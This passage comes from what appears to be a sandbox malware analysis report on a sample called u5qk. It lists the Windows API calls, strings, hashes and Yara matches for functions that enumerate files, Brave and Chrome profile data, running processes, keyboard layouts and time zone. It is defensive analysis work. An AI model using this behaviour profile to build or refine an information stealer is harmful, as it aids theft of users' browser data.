                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                                                      • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                                                                                                                                                                                                                      • API String ID: 3334442632-726946144
                                                                                                                                                                                                                                      • Opcode ID: 217fbc089ea81eaa224ec90d0f64b3e91da9f160fea060791b47bc177b42c4e3
                                                                                                                                                                                                                                      • Instruction ID: 76d401781d3fce7c968e745dc043d6a6225f477281f2400f678919b217ba5a4c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 217fbc089ea81eaa224ec90d0f64b3e91da9f160fea060791b47bc177b42c4e3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F423572A0010457CF14FB61DC56EEE773DAF84304F41455EF90AA6181EE38AB89CBE9
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1197 6ba535a0-6ba535be 1198 6ba535c4-6ba535ed InitializeCriticalSectionAndSpinCount getenv 1197->1198 1199 6ba538e9-6ba538fb call 6ba8b320 1197->1199 1201 6ba535f3-6ba535f5 1198->1201 1202 6ba538fc-6ba5390c strcmp 1198->1202 1205 6ba535f8-6ba53614 QueryPerformanceFrequency 1201->1205 1202->1201 1204 6ba53912-6ba53922 strcmp 1202->1204 1206 6ba53924-6ba53932 1204->1206 1207 6ba5398a-6ba5398c 1204->1207 1208 6ba5374f-6ba53756 1205->1208 1209 6ba5361a-6ba5361c 1205->1209 1210 6ba53622-6ba5364a _strnicmp 1206->1210 1214 6ba53938 1206->1214 1207->1205 1212 6ba5375c-6ba53768 1208->1212 1213 6ba5396e-6ba53982 1208->1213 1209->1210 1211 6ba5393d 1209->1211 1215 6ba53944-6ba53957 _strnicmp 1210->1215 1216 6ba53650-6ba5365e 1210->1216 1211->1215 1217 6ba5376a-6ba537a1 QueryPerformanceCounter EnterCriticalSection 1212->1217 1213->1207 1214->1208 1215->1216 1219 6ba5395d-6ba5395f 1215->1219 1218 6ba53664-6ba536a9 GetSystemTimeAdjustment 1216->1218 1216->1219 1220 6ba537b3-6ba537eb LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 1217->1220 1221 6ba537a3-6ba537b1 1217->1221 1222 6ba53964 1218->1222 1223 6ba536af-6ba53749 call 6ba8c110 1218->1223 1224 6ba537ed-6ba537fa 1220->1224 1225 6ba537fc-6ba53839 LeaveCriticalSection 1220->1225 1221->1220 1222->1213 1223->1208 1224->1225 1227 6ba53846-6ba538ac call 6ba8c110 1225->1227 1228 6ba5383b-6ba53840 1225->1228 1232 6ba538b2-6ba538ca 1227->1232 1228->1217 1228->1227 1233 6ba538dd-6ba538e3 1232->1233 1234 6ba538cc-6ba538db 1232->1234 1233->1199 1234->1232 1234->1233
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6BADF688,00001000), ref: 6BA535D5
                                                                                                                                                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6BA535E0
                                                                                                                                                                                                                                      • QueryPerformanceFrequency.KERNEL32(?), ref: 6BA535FD
                                                                                                                                                                                                                                      • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6BA5363F
                                                                                                                                                                                                                                      • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6BA5369F
                                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6BA536E4
                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 6BA53773
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6BADF688), ref: 6BA5377E
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6BADF688), ref: 6BA537BD
                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 6BA537C4
                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6BADF688), ref: 6BA537CB
                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6BADF688), ref: 6BA53801
                                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6BA53883
                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6BA53902
                                                                                                                                                                                                                                      • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6BA53918
                                                                                                                                                                                                                                      • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6BA5394C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2564719007.000000006BA51000.00000020.00000001.01000000.00000012.sdmp, Offset: 6BA50000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2564543104.000000006BA50000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565455301.000000006BACD000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2565741669.000000006BADE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2566115642.000000006BAE2000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_6ba50000_u5qk.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                                                                                      • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
                                                                                                                                                                                                                                      • API String ID: 301339242-3790311718
                                                                                                                                                                                                                                      • Opcode ID: b2d6c757d61ba54b5f1f4e6e3b6ad93fe7e074bb425fe892318644b8e5793556
                                                                                                                                                                                                                                      • Instruction ID: f27bc089488438112491427b1981a3b1555f114a56c1ecc0ce6ae56933d75d23
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b2d6c757d61ba54b5f1f4e6e3b6ad93fe7e074bb425fe892318644b8e5793556
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E5B193B2A083509FDF18CF28C85465AB7E5FBCA700F04C92EE899D3790D775D9428B51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00412589
                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 004125A0
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0041D864), ref: 004125CE
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0041D868), ref: 004125E4
                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 004127B9
                                                                                                                                                                                                                                      • FindClose.KERNEL32(000000FF), ref: 004127CE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                                                                                      • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                                      • API String ID: 180737720-445461498
                                                                                                                                                                                                                                      • Opcode ID: cfff7e71d02b1736ab1f1f7c997ebdcc83a84c1d4f68987a5e2369cfcdad3dbb
                                                                                                                                                                                                                                      • Instruction ID: 16fd5a9597efbfb91ed0225017393bb16e0f77851f83799e5682f8bc7922baf0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cfff7e71d02b1736ab1f1f7c997ebdcc83a84c1d4f68987a5e2369cfcdad3dbb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 676156B2900618ABCB24EBE0DD99EEA737DBF58701F00458DB61A96140EF74DB85CF94
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00411B9D
                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 00411BB4
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0041D834), ref: 00411BE2
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0041D838), ref: 00411BF8
                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00411D3D
                                                                                                                                                                                                                                      • FindClose.KERNEL32(000000FF), ref: 00411D52
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                                                                                                                                                      • String ID: %s\%s
                                                                                                                                                                                                                                      • API String ID: 180737720-4073750446
                                                                                                                                                                                                                                      • Opcode ID: 6a840e30490d0d08afdc1253b2c36dc6dcc5f64356898c57fcf5146ff498d072
                                                                                                                                                                                                                                      • Instruction ID: 1beca0db89a34a7d9f561fb59a57ff38f1a0216f2a844ef05cbde65d1a44dc5a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6a840e30490d0d08afdc1253b2c36dc6dcc5f64356898c57fcf5146ff498d072
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D75168B5900618ABCB24EBB0DC85EEA737DBB48304F40458DB65A96050EB79ABC5CF94
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215C4,?,00401E03,?,004215C8,?,?,00000000,?,00000000), ref: 00401813
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,004215CC), ref: 00401863
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,004215D0), ref: 00401879
                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401C30
                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 00401CB4
                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00401D0A
                                                                                                                                                                                                                                      • FindClose.KERNEL32(000000FF), ref: 00401D1C
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                                                      • API String ID: 1415058207-1173974218
                                                                                                                                                                                                                                      • Opcode ID: f4763ada7c031ff38536aef9cb867afa4938067a9319c6e9b980bcd3ea4aaa06
                                                                                                                                                                                                                                      • Instruction ID: 3aa4ae790513c502dab12fd0122e5550b13815c0fff8c800b600eb4522263f51
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f4763ada7c031ff38536aef9cb867afa4938067a9319c6e9b980bcd3ea4aaa06
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D41225759102189BCB15FB61DC56EEE7739AF54308F41419EB10A62091EF38AFC9CFA8
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0041DC10,0041D73F), ref: 0040D22B
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0041DC14), ref: 0040D273
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0041DC18), ref: 0040D289
                                                                                                                                                                                                                                      • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040D4EE
                                                                                                                                                                                                                                      • FindClose.KERNEL32(000000FF), ref: 0040D500
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3334442632-0
                                                                                                                                                                                                                                      • Opcode ID: b40c84206ab88950c8bc1da80f20c02468e8b1956029bad3f7442f400096f154
                                                                                                                                                                                                                                      • Instruction ID: a7e743a2a4f5118c59e4eb5b7e6cabc454f6fbff0e67e47d23a58287cf68124a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b40c84206ab88950c8bc1da80f20c02468e8b1956029bad3f7442f400096f154
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63913B72A0020497CB14FFB1EC569EE777DAB84308F41466EF90A96581EE38D788CBD5
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                      • GetKeyboardLayoutList.USER32(00000000,00000000,0041D146), ref: 0041459E
                                                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 004145B6
                                                                                                                                                                                                                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 004145CA
                                                                                                                                                                                                                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0041461F
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 004146DF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                                                                                                                                                                      • String ID: /
                                                                                                                                                                                                                                      • API String ID: 3090951853-4001269591
                                                                                                                                                                                                                                      • Opcode ID: f7e689532fcb6c20cb78a89c4a24d6f915bfb465a8112885e31d740b2fc4d9cf
                                                                                                                                                                                                                                      • Instruction ID: e4a09482d03fe0ac07b2aa12fe49ef9b635f824a972481fa3f662a7a2871ed61
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f7e689532fcb6c20cb78a89c4a24d6f915bfb465a8112885e31d740b2fc4d9cf
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5413B74940218ABCB24DF50DC89BEDB775BB54308F2042DAE10A66191DB786FC5CF54
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,0041D74E), ref: 0040DBD2
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0041DC58), ref: 0040DC22
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0041DC5C), ref: 0040DC38
                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E306
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                                                      • API String ID: 433455689-1173974218
                                                                                                                                                                                                                                      • Opcode ID: b704405470cac820e6730755b1db4dd3b53a4f97c5af91ab5e7e42f18d6cbca2
                                                                                                                                                                                                                                      • Instruction ID: 8f23b39e961a58df861ec407c7814dc8b58ae9c3eb94c511c30fb23e96a564a4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b704405470cac820e6730755b1db4dd3b53a4f97c5af91ab5e7e42f18d6cbca2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88126771A002145ACB14FB61DC56EED7739AF54308F4142AEB50A66091EF389FC8CFE8
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BinaryCryptString
                                                                                                                                                                                                                                      • String ID: >N@
                                                                                                                                                                                                                                      • API String ID: 80407269-3381801619
                                                                                                                                                                                                                                      • Opcode ID: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
                                                                                                                                                                                                                                      • Instruction ID: 37622f5e64546725dbf22d4b9568f407ee9b467eb6af981ec2fff7c5b56759cd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 718bb6be1b75e617e987197471ae693474da6023ddc0167bf927d0320b7ad6f5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 73110D74200A04FFDB10CFA4E844FEB37AABF89310F509549F9098B254D775E881DBA4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415D1E
                                                                                                                                                                                                                                      • Process32First.KERNEL32(0041D599,00000128), ref: 00415D32
                                                                                                                                                                                                                                      • Process32Next.KERNEL32(0041D599,00000128), ref: 00415D47
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,00000000), ref: 00415D5C
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(0041D599), ref: 00415D7A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 420147892-0
                                                                                                                                                                                                                                      • Opcode ID: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
                                                                                                                                                                                                                                      • Instruction ID: 4a4bbd9776da2ad99231b6c5471aa9e11f786ff18f9e7f574f496e4dc08d41d8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f6d0f21b7cc225942ebaf2b71921687e4bacd107d031d79921886f9976f157bb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53012575A00608EBDB24DF94DD58BDEB7B9BF88304F108189E90597250DB749B81CF50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,04076A38,00000000,?,0041D758,00000000,?,00000000,00000000,?,04077130,00000000), ref: 004144C0
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 004144C7
                                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?), ref: 004144DA
                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00414514
                                                                                                                                                                                                                                      Memory Dump Source
